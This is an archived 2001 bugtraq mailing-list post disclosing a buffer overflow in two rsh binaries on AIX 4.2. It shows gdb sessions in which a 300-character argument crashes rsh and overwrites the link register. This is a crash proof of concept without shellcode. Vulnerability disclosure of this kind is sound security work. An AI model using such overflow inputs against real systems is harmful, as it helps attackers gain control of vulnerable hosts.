[20982] in bugtraq

home help back first fref pref prev next nref lref last post

rsh bufferoverflow on AIX 4.2

daemon@ATHENA.MIT.EDU (ox)
Tue Jun 12 14:54:19 2001

From: "ox" <ymc@iss.com.tw>
To: <bugtraq@securityfocus.com>
Date: Tue, 12 Jun 2001 11:40:20 +0800
Message-ID: <NFBBLJDKGKGPELLLMCNEOELICAAA.ymc@iss.com.tw>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="big5"
Content-Transfer-Encoding: 8bit

Hello bugtraq, 

    I am sorry if the problem had been found before, that is  bufferoverflow what I found  both /usr/bin/rsh and /usr/lpp/ssp/rcmd/bin/rsh. 


1. version description 

% oslevel 
4.2.0.0

% uname -a
AIX iss_tw 2 4 000342955700

2. problem found 

/*********************************************************************************************************************/
/*          /usr/lpp/ssp/rcmd/bin/rsh  problem      */
/*         we can easy to overflow LR which AIX using to return from this register   */ 
/*********************************************************************************************************************/
% /usr/local/bin/gdb /usr/lpp/ssp/rcmd/bin/rsh
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) set args `perl -e 'print "A" x 300'` a
(gdb) r
Starting program: /usr/lpp/ssp/rcmd/bin/rsh `perl -e 'print "A" x 300'` a
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x61616160 in ?? () from (unknown load module)
(gdb) info register lr
lr             0x61616161       1633771873
(gdb)
/*********************************************************************************************************************/

another is

/*********************************************************************************************************************/
/*         /usr/bin/rsh  problem      */
/*********************************************************************************************************************/
% /usr/local/bin/gdb /usr/bin/rsh
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) set args `perl -e 'print "A" x 300'` a
(gdb) r
Starting program: /usr/bin/rsh `perl -e 'print "A" x 300'` a
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x61616160 in ?? () from (unknown load module)
(gdb) info register lr
lr             0x61616161       1633771873
(gdb) 
/*********************************************************************************************************************/


Sincerely yours,


--
Yu-Min Chang
ymc@iss.com.tw
R&D Team, ISS-TW(internet security solutions, Taiwan)
home help back first fref pref prev next nref lref last post